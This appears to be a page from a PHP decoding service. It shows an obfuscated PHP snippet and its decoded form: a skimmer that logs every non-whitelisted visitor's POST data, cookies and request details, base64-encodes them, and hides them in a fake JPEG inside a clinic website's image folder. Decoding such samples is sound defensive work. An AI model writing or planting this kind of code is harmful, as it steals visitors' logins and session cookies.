Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (!preg_match("\x2f\x28\x31\x37\70\134\x2e\61\x37\x35\134\x2e\61\63\71\x5c\x2e\x32\x30\..

Decoded Output download

<?   if (!preg_match("/(178\.175\.139\.202)|(95\.216\.15\.25)/", $_SERVER["REMOTE_ADDR"]) && !preg_match("/(178\.175\.139\.202)|(95\.216\.15\.25)/", $_SERVER["HTTP_X_FORWARDED_FOR"])) { $string = " [" . date("D M d H:i:s Y", time()) . "] " . $_SERVER["REMOTE_ADDR"] . " " . $_SERVER["REQUEST_URI"] . " " . $_SERVER["HTTP_HOST"] . " " . $_SERVER["SCRIPT_FILENAME"] . " " . $_SERVER["PHP_SELF"] . " " . $_SERVER["HTTP_X_FORWARDED_FOR"] . " " . $_SERVER["HTTP_USER_AGENT"] . " " . print_r($_POST, true) . " " . print_r($_COOKIE, true); file_put_contents("/usr/home/clinicaduranburgos.com/web/blanqueamiento-dental/img/duran.jpg", base64_encode($string) . PHP_EOL, FILE_APPEND); } ?>

Did this file decode correctly?

Original Code

 if (!preg_match("\x2f\x28\x31\x37\70\134\x2e\61\x37\x35\134\x2e\61\63\71\x5c\x2e\x32\x30\x32\51\174\50\x39\65\134\56\x32\x31\66\x5c\x2e\x31\x35\x5c\56\x32\x35\51\57", $_SERVER["\122\105\x4d\x4f\124\105\x5f\101\x44\x44\x52"]) && !preg_match("\57\50\x31\67\70\134\56\x31\x37\x35\134\x2e\61\63\x39\134\x2e\62\60\62\51\x7c\x28\x39\x35\x5c\56\x32\x31\66\134\56\x31\65\134\56\x32\65\51\x2f", $_SERVER["\x48\124\124\x50\x5f\x58\x5f\x46\117\x52\x57\x41\x52\x44\x45\104\x5f\x46\117\122"])) { $string = "\x20\x5b" . date("\104\40\x4d\x20\144\40\x48\72\151\x3a\163\40\x59", time()) . "\x5d\40" . $_SERVER["\x52\105\115\117\124\105\137\x41\104\x44\122"] . "\x20" . $_SERVER["\122\105\121\x55\105\123\x54\x5f\125\122\x49"] . "\x20" . $_SERVER["\x48\124\x54\120\137\x48\117\123\124"] . "\x20" . $_SERVER["\123\103\122\x49\x50\124\137\106\111\114\105\116\101\115\x45"] . "\x20" . $_SERVER["\120\x48\120\137\123\x45\114\x46"] . "\x20" . $_SERVER["\110\124\124\x50\137\x58\137\106\x4f\x52\x57\x41\x52\104\105\x44\x5f\x46\x4f\122"] . "\x20" . $_SERVER["\x48\124\x54\120\137\125\123\105\x52\x5f\x41\107\105\x4e\124"] . "\x20" . print_r($_POST, true) . "\40" . print_r($_COOKIE, true); file_put_contents("\57\165\163\162\57\x68\157\x6d\145\x2f\143\154\151\x6e\151\143\x61\x64\165\162\141\x6e\142\x75\x72\x67\157\163\x2e\x63\157\x6d\x2f\167\x65\142\x2f\x62\x6c\141\x6e\161\x75\145\141\x6d\151\x65\x6e\x74\x6f\x2d\x64\145\x6e\x74\141\x6c\x2f\151\x6d\147\57\x64\165\162\x61\x6e\56\x6a\160\147", base64_encode($string) . PHP_EOL, FILE_APPEND); }

Function Calls

date 1
time 1
preg_match 2

Variables

None

Stats

MD5 d0edea3615b3eca4f04892b713866408
Eval Count 0
Decode Time 66 ms